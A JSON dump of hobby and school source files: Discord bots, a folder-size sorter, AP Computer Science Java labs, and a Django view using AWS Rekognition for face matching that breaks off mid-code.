"text": "const Discord = require('discord.js');\nconst client = new Discord.Client({\n\tdisableMentions: \"everyone\",\n\tpartials: ['MESSAGE']\n});\nconst prefix = \"!\";\nconst commands = require('./commands.json');\nconst random = require('./random.json')\n\nclient.on('ready', () => {\n\tconsole.log(\"Ready\");\n\tclient.user.setPresence({\n\t\tactivity: {\n\t\t\tname: \"the call of the universe.\",\n\t\t\ttype: \"LISTENING\"\n\t\t},\n\t\tstatus: \"online\"\n\t});\n});\n\nclient.on('message', async message => {\n if (message.partial) await message.fetch(); // Deal with partials\n if (message.author.bot) return;\n let args = message.content.substring(prefix.length).split(\" \");\n let command = commands[args[0].toLowerCase()]; // For some reason, having a variable makes it so the following line works properly.\n if (command === undefined) return;\n \n switch (args[0].toLowerCase()) {\n\t\tcase \"help\":\n\t\t\tlet tbsHelp = \"Here are the list of commands:\\n\\n\";\n\t\t\tfor (let i = 0; i < Object.keys(commands).length; i++) { // This looks scary and if anyone has tips for making it less so please tell me.\n\t\t\t\tlet localcmd = commands[Object.keys(commands)[i]]; // makes things less messy\n\t\t\t\tif (localcmd[\"info\"] == \"alias\") continue;\n\t\t\t\ttbsHelp += \"**\" + prefix + Object.keys(commands)[i];\n\t\t\t\tlet tempvar = localcmd[\"args\"];\n\t\t\t\tif (!(tempvar === undefined)) {\n\t\t\t\t\ttbsHelp += \" [\" + tempvar + \"]\";\n };\n tbsHelp += \"**: \" + localcmd[\"info\"] + \"\\n\"\n\t\t\t};\n\t\t\tmessage.channel.send(tbsHelp);\n\t\t\tbreak\n case \"assimiliate\":\n message.channel.send(\"Another follower.\");\n break;\n case \"commune\": \n message.channel.send(random[\"commune\"][Math.floor(Math.random() * random[\"commune\"].length)].replace(\"{user}\", \"<@\" + message.author.id + \">\"));\n break;\n case \"sing\":\n message.channel.send(\"Ahh... this tune appeases us. Thank you. I grant unto thee the blessing of the Crimp for a day.\");\n break;\n case \"truth\":\n message.channel.send(\"You wish to know the truth, \" + message.author.username + \"? How vain. Very well, we shall describe it for you. Your universe is nothing but p̷o̷i̵u̶y̵t̸r̴e̸w̵q̴a̵s̴d̶f̶g̸h̸j̶k̵l̸m̶n̶b̶v̵c̴x̷z̸. Pardon us, but it appears that we cannot put it into simple mortal terms. You'd best keep searching...\");\n break;\n default:\n break;\n }\n})\n\nclient.login(\"REDACTED\")"
},
{
"alpha_fraction": 0.6193997263908386,
"alphanum_fraction": 0.6420182585716248,
"avg_line_length": 35.492061614990234,
"blob_id": "298fde2252bd1b5716ebcc727f4d44b3f01c49e1",
"content_id": "9b07020f4fd126e81a55d0ffc87b02361c1cca5f",
"detected_licenses": [
"MIT",
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4598,
"license_type": "permissive",
"max_line_length": 260,
"num_lines": 126,
"path": "/JavaScript/DiscordBots/skid-bot-test/index.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Skid Bot created by ZenIsBestWolf#0446.\n// This is intended for one server only. Things may break if used in multiple servers.\nconst Discord = require('discord.js');\nconst client = new Discord.Client();\nvar token = \"redacted\"\nvar prefix = \".\"\nvar zen = \"183672121522782208\"\nvar requestChannelID = \"378667587510468608\"\nclient.on('ready', () => {\n\tconsole.log('Skid Bot is online. Prefix is ' + prefix)\n\tclient.user.setGame('being a skid.')\n});\nprocess.on('unhandledRejection', console.error);\nvar memberTrackingChannelID = \"376581386540285963\"\nclient.on('guildMemberAdd', member => {\n\tlet guild = member.guild;\n\tguild.channels.get(memberTrackingChannelID).send(member + \" has joined the server! Welcome!\");\n});\nclient.on('guildMemberRemove', member => {\n\tlet guild = member.guild;\n\tguild.channels.get(memberTrackingChannelID).send(member + \" has left. RIP!\");\n});\nclient.on('message', message => {\n\tif (!message.content.startsWith(prefix)) return;\n\tif (message.author.bot) return;\n\tvar args = message.content.substring(prefix.length).split(\" \");\n\tif (message.channel.id === requestChannelID) {\n\t\tvar role = args.join(' ').slice(args[0].length).trim().toLowerCase();\n\t\tswitch (args[0].toLowerCase()) {\n\t\t\tcase \"addrole\":\n\t\t\t\tswitch (role) {\n\t\t\t\t\tcase \"doorknob\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"doorknob\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\")\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t}\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"doorknob\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\")\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"staff tt\":\n\t\t\t\t\t\tmessage.reply(\":x: I can't just *give* you the staff role!\")\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tmessage.reply(\":question: I can't find that role. Did you spell it right?\")\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase \"removerole\":\n\t\t\t\tswitch (args[1].toLowerCase()) {\n\t\t\t\t\tcase \"doorknob\":\n\t\t\t\t\t\tif (!message.member.roles.exists(\"name\", \"doorknob\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You don't have that role.\")\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t}\n\t\t\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"doorknob\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role removed!\")\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"staff tt\":\n\t\t\t\t\t\tmessage.reply(\"You shouldn\\'t have the staff role silly!\")\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tdefault:\n\t\t\t\t\t\tmessage.reply(\":question: I can't find that role. Did you spell it right?\")\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase \"finish\":\n\t\t\t\tmessage.member.removeRole(message.member.guild.roles.find(\"name\", \"Skid\"));\n\t\t\t\tmessage.delete()\n\t\t\t\tbreak;\n\t\t};\n\t};\n\tswitch (args[0]) {\n\t\tcase \"help\":\n\t\t\tvar helpEmbed = new Discord.RichEmbed().setThumbnail(client.user.avatarURL).setAuthor('Commands', client.user.avatarURL).setTitle('Command List').setDescription('Commands everyone can use.').setColor(0x1bb80f).addField(prefix + 'help - Sends this command.')\n\t\t\tmessage.reply(helpEmbed)\n\t\t\tbreak;\n\t};\n\tif (message.member.roles.exists(\"name\", \"Staff\")) {\n\t\tconsole.log(\"Staff member \" + message.author.username + \" has called a command.\")\n\t\tswitch (args[0]) {\n\t\t\tcase \"purge\":\n\t\t\t\tif (isNaN(args[1])) {\n\t\t\t\t\tmessage.reply(\"Invalid number to purge.\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 20000));\n\t\t\t\t\treturn;\n\t\t\t\t};\n\t\t\t\tif (args[1] > 100) {\n\t\t\t\t\tmessage.reply(\"The maximum value of messages you can purge is 100!\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 20000));\n\t\t\t\t\treturn;\n\t\t\t\t};\n\t\t\t\tif (args[1] < 1) {\n\t\t\t\t\tmessage.reply(\"The minimum value of messages you can purge is 1!\").then(e => setTimeout(function() {\n\t\t\t\t\t\te.delete();\n\t\t\t\t\t}, 20000));\n\t\t\t\t\treturn;\n\t\t\t\t};\n\t\t\t\tvar purgenum = args[1]\n\t\t\t\tmessage.channel.fetchMessages({\n\t\t\t\t\tlimit: purgenum\n\t\t\t\t}).then(function(messages) {\n\t\t\t\t\tmessages.deleteAll();\n\t\t\t\t});\n\t\t\t\tbreak;\n\t\t};\n\t};\n\tif (message.author.id === zen) {\n\t\tswitch (args[0]) {\n\t\t\tcase \"famify\":\n\t\t\t\tvar fam = message.mentions.members.first();\n\t\t\t\tif (fam.roles.exists(\"name\", \"Staff\")) {\n\t\t\t\t\tmessage.reply(\"That skid is already part of the :triumph::ok_hand::family::sunglasses: **FAM SQUAD** :sunglasses::family::ok_hand::triumph:\")\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t\tmessage.channel.send(\":triumph: :triumph: THROUGH THE POWER OF GRINDING :triumph: :triumph:\").then(setTimeout(function() {\n\t\t\t\t\tmessage.channel.send(\":ok_hand: :ok_hand: \" + args[1] + \" I HEAR BY DEEM YOU... :ok_hand: :ok_hand:\").then(setTimeout(function() {\n\t\t\t\t\t\tmessage.channel.send(\":family: :family: :sunglasses: :sunglasses: PART OF THE FAM :sunglasses: :sunglasses: :family: :family:\")\n\t\t\t\t\t}, 2000));\n\t\t\t\t}, 2000));\n\t\t\t\tfam.addRole(message.member.guild.roles.find(\"name\", \"Staff\"))\n\t\t\t\tbreak;\n\t\t\tdefault:\n\t\t}\n\t}\n});\nclient.login(token)\n"
},
{
"alpha_fraction": 0.5548738837242126,
"alphanum_fraction": 0.5671438574790955,
"avg_line_length": 31.600000381469727,
"blob_id": "efb4353dfbb412d64bb711a472b2f45db2010dba",
"content_id": "c4ba390d5c09de4d74c320b67e64ec609a8510c9",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1467,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 45,
"path": "/Python/Sort.py",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "# Prints a sorted by size (descending) list of folders within the given directory.\nimport os\nimport math\nimport operator\nimport collections\nprint(\"Enter the directory below to sort through. Example input: (Winodws) C:\\\\Users\\\\Zen (*nix) /home/zen\ndirectory = input(\"Enter directory: \")\nfolders = []\nfolderSizes = {}\nscount = 0\nfcount = 0\ntcount = 0\nfor r, d, f in os.walk(directory):\n for dir in d:\n folders.append(dir)\nfor i in folders:\n for r, d, f in os.walk(directory + i + \"\\\\\"):\n for file in f:\n tcount+=1\n if tcount%10000 == 0:\n print(\"Total: \" + str(tcount))\n print(\"Successful: \" + str(scount))\n print(\"Failed: \" + str(fcount))\n print()\n try:\n tmps = os.path.getsize(directory + i + \"\\\\\" + file)\n except:\n #print(\"File \" + directory + i + \"\\\\\" + file + \" was unreadable.\")\n fcount+=1\n continue\n tmps/=1024\n tmps = math.ceil(tmps)\n folderSizes[i] = tmps\n scount+=1\n# Sort\ntmpFS = sorted(folderSizes.items(), key=operator.itemgetter(1))\ntmpFS.reverse()\nsortedFolders = collections.OrderedDict(tmpFS)\nfor a in sortedFolders:\n if sortedFolders[a] == 1:\n sortedFolders[a] = str(sortedFolders[a]) + \"KB\"\n else:\n sortedFolders[a] = str(sortedFolders[a]) + \"KBs\"\nfor b in sortedFolders:\n print(b, sortedFolders[b])\n"
},
{
"alpha_fraction": 0.5518565773963928,
"alphanum_fraction": 0.5518565773963928,
"avg_line_length": 25.066667556762695,
"blob_id": "61ac763740bd84d8159da095f76395cb3c14bed1",
"content_id": "d5ccf979e6bb07c527794f03640356123099b789",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 781,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 30,
"path": "/Java/APCSA/Food.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "public class Food {\n private String mealType;\n private String color;\n private boolean isVegetarian;\n public Food() {\n mealType = \"\";\n color = \"\";\n isVegetarian = false;\n }\n public Food(String type, String col, boolean isVeg) {\n mealType = type;\n color = col;\n isVegetarian = isVeg;\n }\n public Food(String type, String col) {\n mealType = type;\n color = col;\n isVegetarian = false;\n }\n public Food(String type) {\n mealType = type;\n color = \"\";\n isVegetarian = false;\n }\n public void print() {\n System.out.println(\"Meal Type: \" + mealType);\n System.out.println(\"Color: \" + color);\n System.out.println(\"Is Vegetarian: \" + isVegetarian);\n }\n}"
},
{
"alpha_fraction": 0.5361823439598083,
"alphanum_fraction": 0.5601139664649963,
"avg_line_length": 21.227848052978516,
"blob_id": "609c70483924dd437f06c754ed60aef25953f879",
"content_id": "985b58c510c40e75fe8e72eb7bf218a202522992",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1755,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 79,
"path": "/Java/APCSA/Lab05a1vst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab05a1vst.java\n// The Rational Class Program I\n// This is the student starting Version of the Lab05a1 assignment.\nimport java.util.*;\npublic class Lab05a1vst\n{\n\tpublic static void main (String[] args)\n\t{\n Scanner s1 = new Scanner(System.in);\n Scanner s2 = new Scanner(System.in);\n System.out.print(\"\\nEnter the numerator ----> \");\n\t\tint num = s1.nextInt();\n\t\tSystem.out.print(\"\\nEnter the denominator --> \");\n\t\tint den = s2.nextInt();\n\t\tRational r = new Rational(num,den);\n\t\tr.displayData();\n\t}\n}\n\n\nclass Rational\n{\n\tprivate int num;\n\tprivate int den;\n\n // Complete for 80-Points\n\tpublic Rational(int initNum, int initDen) \n\t{\n num = initNum;\n den = initDen;\n\t}\n\n // Complete for 80-Points\n\tpublic double getDecimal() \n { \n return (double) num / (double) den;\n }\n \n // Complete for 80-Points\n public String getRational() \n { \n return \"\" + num + \"/\" + den;\n }\n\n // Complete for 100-Points\n\tpublic String getReduced() \n {\n int gcf = getGCF(num, den);\n int rNum = num/gcf;\n int rDen = den/gcf;\n return \"\" + rNum + \"/\" + rDen;\n }\n\n // Method for 80-Points; Change for 100-Points\n\tpublic void displayData()\n\t{\n\t\tSystem.out.println();\n\t\tSystem.out.println(getRational() + \" equals \" + getDecimal());\n System.out.println();\n System.out.println(\"and reduces to \" + getReduced());\n\t}\n\n // Complete for 100-Points\n\tprivate int getGCF(int n1,int n2)\n\t{\n int remainder = 1;\n int gcf = 1;\n while (remainder != 0) {\n remainder = n1%n2;\n if (remainder == 0) {\n gcf = n2;\n } else {\n n1 = n2;\n n2 = remainder;\n }\n }\n return gcf;\n\t}\n}"
},
{
"alpha_fraction": 0.5715676546096802,
"alphanum_fraction": 0.6825705766677856,
"avg_line_length": 36.01801681518555,
"blob_id": "ce8a7d285acf1a1183bddfb89a9909d7f900d3c5",
"content_id": "98be9ff528a84509999707ff9247aaa2cf5a7c36",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4108,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 111,
"path": "/Java/APCSA/Lab02avstNICE.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "import java.awt.*;\nimport java.applet.*;\npublic class Lab02avstNICE extends Applet {\n\tpublic void paint(Graphics g) {\n\t\t// Define color set.\n\t\tColor black = new Color(0,0,0);\n\t\tColor white = new Color(255,255,255);\n\t\tColor red = new Color(255,0,0);\n\t\tColor green = new Color(0,255,0);\n\t\tColor blue = new Color(0,0,255);\n\t\tColor gray = new Color((float)0,(float)0,(float)0,(float)0.5);\n\t\tthis.setSize(3000,1600); // Applet window size.\n\t\tg.setColor(black); // Make sure default color is set.\n\t\tdrawCube(g,500,500,500); // Draw cube.\n\t\tdrawSphere(g,450,450,500,130); // Draw sphere.\n\t\tdrawFlower(g,1400,800,100); // Draw pacmen flower.\n\t\t// Draw inscribed triangle.\n\t\tg.drawOval(1500,500,400,400); // Draw outer circle.\n\t\tg.drawPolygon(new int[] {1600,1898,1600},new int[] {530,700,878},3); // Draw triangle.\n\t\tg.drawOval(1600,600,200,200); // Draw inner circle.\n\t\t// Draw APCS\n\t\t// Outside of A.\n\t\tg.setColor(red); // Color of outside.\n\t\t// Draw an fill the base.\n\t\tg.drawRect(500,1200,150,250);\n\t\tg.fillRect(500,1200,150,250);\n\t\t// Inside of A.\n\t\tg.setColor(white); // Appear translucent.\n\t\t// Draw and fill the larger lower detail.\n\t\tg.drawRect(550,1350,50,100);\n\t\tg.fillRect(550,1350,50,100);\n\t\t// Draw and fill the smaller upper detail.\n\t\tg.drawRect(550,1250,50,50);\n\t\tg.fillRect(550,1250,50,50);\n\t\t// Outside of P.\n\t\tg.setColor(blue); // Color of outside.\n\t\t// Draw an fill the base.\n\t\tg.drawRect(700,1200,150,250);\n\t\tg.fillRect(700,1200,150,250);\n\t\t// Inside of P.\n\t\tg.setColor(white); // Appear translucent.\n\t\t// Draw and fill the larger lower detail.\n\t\tg.drawRect(750,1350,100,100);\n\t\tg.fillRect(750,1350,100,100);\n\t\t// Draw and fill the smaller upper detail.\n\t\tg.drawRect(750,1250,50,50);\n\t\tg.fillRect(750,1250,50,50);\n\t\t// Outside of C.\n\t\tg.setColor(green); // Color of outside.\n\t\t// Draw an fill the base.\n\t\tg.drawRect(900,1200,150,250);\n\t\tg.fillRect(900,1200,150,250);\n\t\t// Inside of C.\n\t\tg.setColor(white); // Appear translucent.\n\t\t// Draw and fill the detail.\n\t\tg.drawRect(950,1250,100,150);\n\t\tg.fillRect(950,1250,100,150);\n\t\t// Outside of S.\n\t\tg.setColor(gray); // Color of outside.\n\t\t// Draw an fill the base.\n\t\tg.drawRect(1100,1200,150,250);\n\t\tg.fillRect(1100,1200,150,250);\n\t\t// Inside of S.\n\t\tg.setColor(white); // Appear translucent.\n\t\t// Draw and fill the upper detail.\n\t\tg.drawRect(1150,1250,100,50);\n\t\tg.fillRect(1150,1250,100,50);\n\t\t// Draw and fill the lower detail.\n\t\tg.drawRect(1100,1350,100,50);\n\t\tg.fillRect(1100,1350,100,50);\n\t}\n\tstatic void drawCube(Graphics g, int x, int y, int size) {\n\t\tint shift = size/4;\n\t\tint shiftedX = x-shift;\n\t\tint shiftedY = y-shift;\n\t\tg.drawRect(x,y,size,size); // Square one.\n\t\tg.drawRect(shiftedX,shiftedY,size,size); // Square two, which is a moved square one.\n\t\t// Draw the connecting lines to form the illusion of a cube.\n\t\tg.drawLine(x,y,shiftedX,shiftedY);\n\t\tg.drawLine(x+size,y,shiftedX+size,shiftedY);\n\t\tg.drawLine(x+size,y+size,shiftedX+size,shiftedY+size);\n\t\tg.drawLine(x,y+size,shiftedX,shiftedY+size);\n\t}\n\tstatic void drawSphere(Graphics g, int x, int y, int size, int stagger) {\n\t\tg.drawOval(x,y,size,size); // Draw outer large circle.\n\t\tfor(int i=1;i<=3;i++) { // Draw horizontal ovals.\n\t\t\tint curStagger = stagger*i;\n\t\t\tint curHalfStagger = (stagger/2)*i;\n\t\t\tg.drawOval(x,y+curHalfStagger,size,size-curStagger);\n\t\t}\n\t\tfor(int i=1;i<=3;i++) { // Draw veritcal ovals.\n\t\t\tint curStagger = stagger*i;\n\t\t\tint curHalfStagger = (stagger/2)*i;\n\t\t\tg.drawOval(x+curHalfStagger,y,size-curStagger,size);\n }\n\t}\n\tstatic void drawFlower(Graphics g, int x, int y, int petalSize) {\n\t\t// Top Right\n\t\tg.drawArc(x,y+petalSize,petalSize,petalSize,90,270);\n\t\tg.fillArc(x,y+petalSize,petalSize,petalSize,90,270);\n\t\t//Top Left\n\t\tg.drawArc(x-petalSize,y+petalSize,petalSize,petalSize,180,270);\n\t\tg.fillArc(x-petalSize,y+petalSize,petalSize,petalSize,180,270);\n\t\t// Bottom Right\n\t\tg.drawArc(x,y+petalSize*2,petalSize,petalSize,360,270);\n\t\tg.fillArc(x,y+petalSize*2,petalSize,petalSize,360,270);\n\t\t// Bottom Left\n\t\tg.drawArc(x-petalSize,y+petalSize*2,petalSize,petalSize,270,270);\n\t\tg.fillArc(x-petalSize,y+petalSize*2,petalSize,petalSize,270,270);\n\t}\n}"
},
{
"alpha_fraction": 0.5037888288497925,
"alphanum_fraction": 0.6164751648902893,
"avg_line_length": 34.894737243652344,
"blob_id": "cc07010edf726205ca08c45d64c98881e5ae6aad",
"content_id": "9c1110770d37669546f17a95c7289de1289d5073",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 4091,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 114,
"path": "/Java/APCSA/Lab02avstPRE.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab02avst.java\n// The AWT Graphics Program\n// This is the student, starting version of Lab02a\n\n\nimport java.awt.*;\nimport java.applet.*;\n\n\npublic class Lab02avstPRE extends Applet\n{\n\n\tpublic void paint(Graphics g)\n\t{\n Color black = new Color(0,0,0);\n Color white = new Color(255,255,255);\n Color red = new Color(255,0,0);\n Color green = new Color(0,255,0);\n Color blue = new Color(0,0,255);\n Color gray = new Color((float) 0, (float) 0,(float) 0,(float) 0.5);\n // Set screen size. This will be different on lower resolution screens an will likely break if lowered much further.\n this.setSize(3000,1600);\n // Set black color.\n g.setColor(black);\n // DRAW CUBE\n drawCube(g,500,500,500);\n\t\t// DRAW SPHERE\n drawSphere(g,450,450,500,130);\n\t\t// DRAW INSCRIBED/CIRCUMSCRIBED TRIANGLE\n g.drawOval(1500,500,400,400);\n g.drawPolygon(new int[] {1600,1898,1600},new int[] {530,700,878},3);\n g.drawOval(1600,600,200,200);\n\t\t// DRAW APCS\n // A outside\n g.setColor(red);\n g.drawRect(500,1200,150,250);\n g.fillRect(500,1200,150,250);\n // A inside\n g.setColor(white);\n g.drawRect(550,1350,50,100);\n g.fillRect(550,1350,50,100);\n g.drawRect(550,1250,50,50);\n g.fillRect(550,1250,50,50);\n // P outside\n g.setColor(blue);\n g.drawRect(700,1200,150,250);\n g.fillRect(700,1200,150,250);\n // P inside\n g.setColor(white);\n g.drawRect(750,1350,100,100);\n g.fillRect(750,1350,100,100);\n g.drawRect(750,1250,50,50);\n g.fillRect(750,1250,50,50);\n // C outside\n g.setColor(green);\n g.drawRect(900,1200,150,250);\n g.fillRect(900,1200,150,250);\n // C inside\n g.setColor(white);\n g.drawRect(950,1250,100,150);\n g.fillRect(950,1250,100,150);\n // S outside\n g.setColor(gray);\n g.drawRect(1100,1200,150,250);\n g.fillRect(1100,1200,150,250);\n // S inside\n g.setColor(white);\n g.drawRect(1150,1250,100,50);\n\t\tg.fillRect(1150,1250,100,50);\n g.drawRect(1100,1350,100,50);\n g.fillRect(1100,1350,100,50);\n // DRAW PACMEN FLOWER\n g.setColor(black);\n drawFlower(g,1400,800,100);\n }\n static void drawCube(Graphics g, int x, int y, int size) {\n int shift = size/4;\n int shiftedX = x - shift;\n int shiftedY = y - shift;\n g.drawRect(x,y,size,size); // Square one.\n g.drawRect(shiftedX,shiftedY,size,size); // Square two, which is a moved square one.\n g.drawLine(x,y,shiftedX,shiftedY); // This line and the next 3 draw the connecting lines to make it look like it's in a cube.\n g.drawLine(x+size,y,shiftedX+size,shiftedY);\n g.drawLine(x+size,y+size,shiftedX+size,shiftedY+size);\n g.drawLine(x,y+size,shiftedX,shiftedY+size);\n }\n static void drawSphere(Graphics g, int x, int y, int size, int stagger) {\n g.drawOval(x,y,size,size); // Draw big circle.\n for(int i=1;i<=3;i++) { // Draw horizontal ovals.\n int curStagger = stagger * i;\n int curHalfStagger = (stagger/2) * i;\n g.drawOval(x,y+curHalfStagger,size,size-curStagger);\n }\n for(int i=1;i<=3;i++) { // Draw veritcal ovals.\n int curStagger = stagger * i;\n int curHalfStagger = (stagger/2) * i;\n g.drawOval(x+curHalfStagger,y,size-curStagger,size);\n }\n }\n static void drawFlower(Graphics g, int x, int y, int petalSize) {\n // Top Right\n g.drawArc(x,y+petalSize,petalSize,petalSize,90,270);\n g.fillArc(x,y+petalSize,petalSize,petalSize,90,270);\n //Top Left\n g.drawArc(x-petalSize,y+petalSize,petalSize,petalSize,180,270);\n g.fillArc(x-petalSize,y+petalSize,petalSize,petalSize,180,270);\n // Bottom Right\n g.drawArc(x,y+petalSize*2,petalSize,petalSize,360,270);\n g.fillArc(x,y+petalSize*2,petalSize,petalSize,360,270);\n // Bottom Left\n g.drawArc(x-petalSize,y+petalSize*2,petalSize,petalSize,270,270);\n g.fillArc(x-petalSize,y+petalSize*2,petalSize,petalSize,270,270);\n }\n}"
},
{
"alpha_fraction": 0.41914892196655273,
"alphanum_fraction": 0.4446808397769928,
"avg_line_length": 26.676469802856445,
"blob_id": "2fc61b1d97ec86cbfb5cbd0640b71a438139015e",
"content_id": "c294cae9fd7161a5cdc6205ebfc633cf266c1c72",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 940,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 34,
"path": "/Java/APCSA/BinarySearch.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "import java.util.ArrayList;\npublic class BinarySearch {\n public static void main(String[] args) {\n ArrayList<Integer> list = new ArrayList<Integer>();\n list.add(0);\n list.add(1);\n list.add(5);\n list.add(7);\n list.add(8);\n list.add(72);\n list.add(96);\n list.add(189);\n list.add(336);\n list.add(900);\n int sN = 8;\n boolean found = false;\n int min = 0;\n int max = list.size() - 1;\n int mid = (max+min)/2;\n while (!found && max>=min) {\n if (max-1 == mid && mid == min)\n break;\n if (list.get(mid) == sN)\n found = true;\n else if (list.get(mid) > sN)\n max = mid;\n else if (list.get(mid) < sN)\n min = mid;\n mid = (max+min)/2;\n }\n System.out.println(found);\n System.out.println(mid);\n }\n}"
},
{
"alpha_fraction": 0.5357142686843872,
"alphanum_fraction": 0.5952380895614624,
"avg_line_length": 25.658536911010742,
"blob_id": "94f74c1f37c8c3b4cb565df82fb827dc8ea144c8",
"content_id": "005ae1f6ad480f9f9f0d08f8888b037ff92bba22",
"detected_licenses": [
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1092,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 41,
"path": "/Java/APCSA/Lab04vst.java",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Lab04vst.java\n// This is the student, starting version of the Lab04 assignment.\n\n\nimport java.awt.*;\nimport java.applet.*;\n\n\npublic class Lab04vst extends Applet\n{\n\tpublic void paint(Graphics g)\n\t{\n this.setSize(1000, 800);\n\t\tint width = 980;\n\t\tint height = 630;\n\t\tint x1 = 10;\n\t\tint y1 = 640;\n\t\tint x2 = 990;\n\t\tint y2 = 640;\n\t\tg.drawRect(10,10,width,height);\n doIt(g,width,height,x2,y1,x1,x2,false,true);\n doIt(g,width,height,x1,y1,x1,x1,true,true);\n doIt(g,width,height,x2,x1,y2,x2,false,false);\n doIt(g,width,height,x1,x1,y1,x1,true,false);\n\t}\n static void doIt(Graphics g, int width, int height, int tmpA, int staticA, int tmpB, int staticB, boolean isFirstAdding, boolean isSecondAdding) {\n for (int i=0;i<=51;i++) {\n g.drawLine(tmpA,staticA,staticB,tmpB);\n if (isFirstAdding) {\n tmpA+=width/50;\n } else if (!isFirstAdding) {\n tmpA-=width/50;\n }\n if (isSecondAdding) {\n tmpB+=height/50;\n } else if (!isSecondAdding) {\n tmpB-=height/50;\n }\n }\n }\n}"
}
] | 21 |
anurag21raghav/Face-Recognizer | https://github.com/anurag21raghav/Face-Recognizer | 4773a3294562b8ff182034e4cac481a459f8e8d2 | b0c6fc3168c93b507cd1c4303bd70ff9a8e7351b | 4c2e8740ee5b356b771d86d031994e60d2abe77d | refs/heads/master | 2021-01-23T09:45:38.816665 | 2017-09-08T12:37:02 | 2017-09-08T12:37:02 | 102,598,481 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6729699373245239,
"alphanum_fraction": 0.6790878772735596,
"avg_line_length": 32.314815521240234,
"blob_id": "a92766728239bea15c0e2066bca41b7d1f05def7",
"content_id": "31edcc36412b5265135be7dcc6f95f2f469616a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1798,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 54,
"path": "/recognizer/views.py",
"repo_name": "anurag21raghav/Face-Recognizer",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nimport boto3\nfrom .models import Image\n\nbucket = \"rekognition-warm-up\"\nKEY = \"{{ uploaded_file_url }}\"\nCOLLECTION = Image.objects.all()\nsourceFile = 'source.jpg'\ntargetFile = 'target.jpg'\n\ndef search_faces_by_image(bucket, key, collection_id, threshold=80, region=\"us-east-1\"):\n\trekognition = boto3.client(\"rekognition\", region)\n\tresponse = rekognition.search_faces_by_image(\n\t\tImage={\n\t\t\t\"S3Object\": {\n\t\t\t\t\"Bucket\": bucket,\n\t\t\t\t\"Name\": key,\n\t\t\t}\n\t\t},\n\t\tCollectionId=collection_id,\n\t\tFaceMatchThreshold=threshold,\n\t)\n\treturn response['FaceMatches']\n\ndef index(request):\n if request.method == 'POST' and request.FILES['myfile']:\n myfile = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(myfile.name, myfile)\n uploaded_file_url = fs.url(filename)\n records = search_faces_by_image(BUCKET, uploaded_file_url, COLLECTION)\n return render(request, 'recognizer/output.html', {'records': records})\n return render(request, 'recognizer/index.html', {\n 'uploaded_file_url': uploaded_file_url\n })\n return render(request, 'recognizer/index.html')\n\ndef output(request):\n\tclient = boto3.client('rekognition')\n\tresponse=client.compare_faces(SimilarityThreshold=70,\n\t\t\t\t\t\t\t\t\tSourceImage={'S3Object':\n\t{'Bucket':bucket, 'Name':sourceFile}},\n\t\t\t\t\t\t\t\t\tTargetImage={'S3Object':\n\t{'Bucket':bucket, 'Name':targetFile}})\n\n\tfor 